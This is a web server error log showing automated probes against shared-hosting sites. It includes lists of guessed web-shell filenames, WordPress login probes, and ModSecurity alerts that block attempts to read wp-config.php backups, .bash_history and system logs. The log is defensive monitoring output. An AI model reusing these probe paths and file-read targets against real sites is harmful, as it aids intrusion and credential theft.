[Mon May 11 17:19:17.661539 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/themes.php
[Mon May 11 17:19:17.844396 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 17:19:18.031033 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/awa.php
[Mon May 11 17:19:18.214072 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/11.php
[Mon May 11 17:19:18.407408 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/p.php
[Mon May 11 17:19:18.780312 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/bthil.php
[Mon May 11 17:19:18.966806 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/shell.php
[Mon May 11 17:19:19.149900 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/seo.php
[Mon May 11 17:19:19.332556 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/7.php
[Mon May 11 17:19:19.515270 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/8.php
[Mon May 11 17:19:19.698036 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/1.php
[Mon May 11 17:19:19.880563 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/class.php
[Mon May 11 17:19:20.063022 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/100.php
[Mon May 11 17:19:20.246967 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/2026w.php
[Mon May 11 17:19:20.430410 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/about.php
[Mon May 11 17:19:20.612873 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/xa.php
[Mon May 11 17:19:20.795552 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 17:19:20.978401 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/w2025.php
[Mon May 11 17:19:21.161047 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/fvvff.php
[Mon May 11 17:19:21.343768 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/edit.php
[Mon May 11 17:19:21.526629 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 17:19:21.897464 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/f6.php
[Mon May 11 17:19:22.080268 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/inputs.php
[Mon May 11 17:19:22.267601 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 17:19:22.636907 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/wp-act.php
[Mon May 11 17:19:22.834778 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/classwithtostring.php
[Mon May 11 17:19:23.199659 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/wp-blog.php
[Mon May 11 17:19:23.748663 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/adminfuns.php
[Mon May 11 17:19:23.935024 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/goods.php
[Mon May 11 17:19:24.117451 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/ms-edit.php
[Mon May 11 17:19:24.300368 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/222.php
[Mon May 11 17:19:24.851186 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/BDKR28WP.php
[Mon May 11 17:19:25.400452 2026] [:error] [pid 1411201:tid 1411255] [client 52.138.31.126:17255] File does not exist: /home/manhatta/public_html/wp.php
[Mon May 11 17:19:26.080491 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 17:19:26.268447 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/abcd.php
[Mon May 11 17:19:26.460593 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/a1.php
[Mon May 11 17:19:27.034329 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/f35.php
[Mon May 11 17:19:27.411280 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/bal.php
[Mon May 11 17:19:27.974988 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/gettest.php
[Mon May 11 17:19:28.540570 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/simple.php
[Mon May 11 17:19:28.729026 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/buy.php
[Mon May 11 17:19:28.917087 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/xxx.php
[Mon May 11 17:19:29.105598 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/hypo.php
[Mon May 11 17:19:29.481646 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/chosen.php
[Mon May 11 17:19:29.865668 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/00.php
[Mon May 11 17:19:30.073307 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/als.php
[Mon May 11 17:19:30.261951 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/pol.php
[Mon May 11 17:19:30.450037 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/ms-amdin.php
[Mon May 11 17:19:30.638077 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/mini-type0.php
[Mon May 11 17:19:30.826398 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/bypasbnget.php
[Mon May 11 17:19:31.015315 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/sf.php
[Mon May 11 17:19:31.203188 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/file5.php
[Mon May 11 17:19:31.391690 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/fs.php
[Mon May 11 17:19:31.579845 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/4PJcpMFsD8B.php
[Mon May 11 17:19:31.768881 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/file.php
[Mon May 11 17:19:31.964015 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/class.1.php
[Mon May 11 17:19:32.152317 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/wp-gr.php
[Mon May 11 17:19:32.340686 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/cfile.php
[Mon May 11 17:19:32.528546 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/class-wp.php
[Mon May 11 17:19:32.701057 2026] [security2:error] [pid 1416109:tid 1416140] [client 43.161.234.148:41910] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.krakoukas.com"] [uri "/"] [unique_id "agHzhFV4kyjgo4bQBUhovwAAAMo"], referer: http://www.krakoukas.com
[Mon May 11 17:19:32.721448 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/ff2.php
[Mon May 11 17:19:32.909610 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/aa2.php
[Mon May 11 17:19:33.097768 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/133.php
[Mon May 11 17:19:33.287791 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/ccou.php
[Mon May 11 17:19:33.475625 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/login8.php
[Mon May 11 17:19:33.666308 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/3586 b64.php
[Mon May 11 17:19:33.854966 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/18299.php
[Mon May 11 17:19:34.043121 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/nx1.php
[Mon May 11 17:19:34.231075 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/Noname6.php
[Mon May 11 17:19:34.419504 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/tia.php
[Mon May 11 17:19:34.607669 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/coa.php
[Mon May 11 17:19:34.795759 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/dr.php
[Mon May 11 17:19:34.983766 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/let.php
[Mon May 11 17:19:35.188000 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/w12.php
[Mon May 11 17:19:35.383978 2026] [:error] [pid 1416109:tid 1416146] [client 52.138.31.126:64451] File does not exist: /home/manhatta/public_html/chati.php
[Mon May 11 17:19:36.648878 2026] [security2:error] [pid 1416109:tid 1416144] [client 43.161.234.148:48254] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agHziFV4kyjgo4bQBUho0QAAAM4"], referer: https://www.krakoukas.com/
[Mon May 11 17:19:38.449168 2026] [security2:error] [pid 1416109:tid 1416147] [client 216.73.216.110:25554] ModSecurity: Warning. Matched phrase "var/log/exim_rejectlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_rejectlog found within ARGS:filesrc: /var/log/exim_rejectlog"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHzilV4kyjgo4bQBUho0wAAANE"]
[Mon May 11 17:19:38.453181 2026] [security2:error] [pid 1416109:tid 1416147] [client 216.73.216.110:25554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHzilV4kyjgo4bQBUho0wAAANE"]
[Mon May 11 17:19:38.545675 2026] [security2:error] [pid 1416109:tid 1416147] [client 216.73.216.110:25554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHzilV4kyjgo4bQBUho0wAAANE"]
[Mon May 11 17:19:39.887710 2026] [security2:error] [pid 1416109:tid 1416137] [client 129.226.174.80:58056] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ixinabourgoin.fr"] [uri "/"] [unique_id "agHzi1V4kyjgo4bQBUho1AAAAMc"]
[Mon May 11 17:19:57.104701 2026] [security2:error] [pid 1411201:tid 1411253] [client 43.165.4.2:42238] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHznfy_GXSWIKeli0sGjQAAAIc"]
[Mon May 11 17:20:04.775044 2026] [security2:error] [pid 1416109:tid 1416150] [client 43.167.157.80:35976] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.com"] [uri "/"] [unique_id "agHzpFV4kyjgo4bQBUho8QAAANQ"]
[Mon May 11 17:20:22.306948 2026] [:error] [pid 1411055:tid 1411059] [client 193.151.189.116:35421] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 17:20:27.400474 2026] [:error] [pid 1411201:tid 1411255] [client 193.151.189.116:43597] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 17:20:29.008077 2026] [:error] [pid 1412074:tid 1412089] [client 193.151.189.116:62011] File does not exist: /home/cpcentre/public_html/wp-admin.php, referer: https://www.google.com
[Mon May 11 17:20:38.653660 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php.backup"] [unique_id "agHzxvy_GXSWIKeli0sG6wAAAI4"]
[Mon May 11 17:20:38.653803 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php.backup"] [unique_id "agHzxvy_GXSWIKeli0sG6wAAAI4"]
[Mon May 11 17:20:38.866660 2026] [security2:error] [pid 1416109:tid 1416142] [client 216.73.216.110:21956] ModSecurity: Warning. Matched phrase ".bash_history" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_history found within ARGS:edit: .bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agHzxlV4kyjgo4bQBUhpFwAAAMw"]
[Mon May 11 17:20:38.867711 2026] [security2:error] [pid 1416109:tid 1416142] [client 216.73.216.110:21956] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agHzxlV4kyjgo4bQBUhpFwAAAMw"]
[Mon May 11 17:20:38.957417 2026] [security2:error] [pid 1416109:tid 1416142] [client 216.73.216.110:21956] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHzxlV4kyjgo4bQBUhpFwAAAMw"]
[Mon May 11 17:20:39.412785 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHzxvy_GXSWIKeli0sG6wAAAI4"]
[Mon May 11 17:20:39.549927 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php.backup"] [unique_id "agHzxw-Qm4vhlWBPlMjMOgAAABA"]
[Mon May 11 17:20:39.550237 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/wp-config.php.backup"] [unique_id "agHzxw-Qm4vhlWBPlMjMOgAAABA"]
[Mon May 11 17:20:40.419141 2026] [security2:error] [pid 1411099:tid 1411116] [client 172.212.217.10:8679] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHzxw-Qm4vhlWBPlMjMOgAAABA"]
[Mon May 11 17:20:46.011527 2026] [security2:error] [pid 1411099:tid 1411110] [client 216.73.216.110:58859] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20260506"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHzzg-Qm4vhlWBPlMjMRwAAAAo"]
[Mon May 11 17:20:46.012694 2026] [security2:error] [pid 1411099:tid 1411110] [client 216.73.216.110:58859] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHzzg-Qm4vhlWBPlMjMRwAAAAo"]
[Mon May 11 17:20:46.072265 2026] [security2:error] [pid 1411099:tid 1411110] [client 216.73.216.110:58859] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHzzg-Qm4vhlWBPlMjMRwAAAAo"]
[Mon May 11 17:20:55.829018 2026] [:error] [pid 1412074:tid 1412081] [client 193.151.189.116:47399] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 17:21:00.535888 2026] [:error] [pid 1412074:tid 1412082] [client 193.151.189.116:26567] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 17:21:01.553584 2026] [:error] [pid 1411099:tid 1411119] [client 193.151.189.116:54105] File does not exist: /home/cpcentre/public_html/wp-admin.php, referer: https://www.google.com
[Mon May 11 17:21:18.636297 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/backup.wp-config.php"] [unique_id "agHz7vy_GXSWIKeli0sHQQAAAI4"]
[Mon May 11 17:21:18.636462 2026] [security2:error] [pid 1411201:tid 1411260] [client 172.212.217.10:27154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/backup.wp-config.php"] [unique_id "agHz7vy_GXSWIKeli0sHQQAAAI4"]
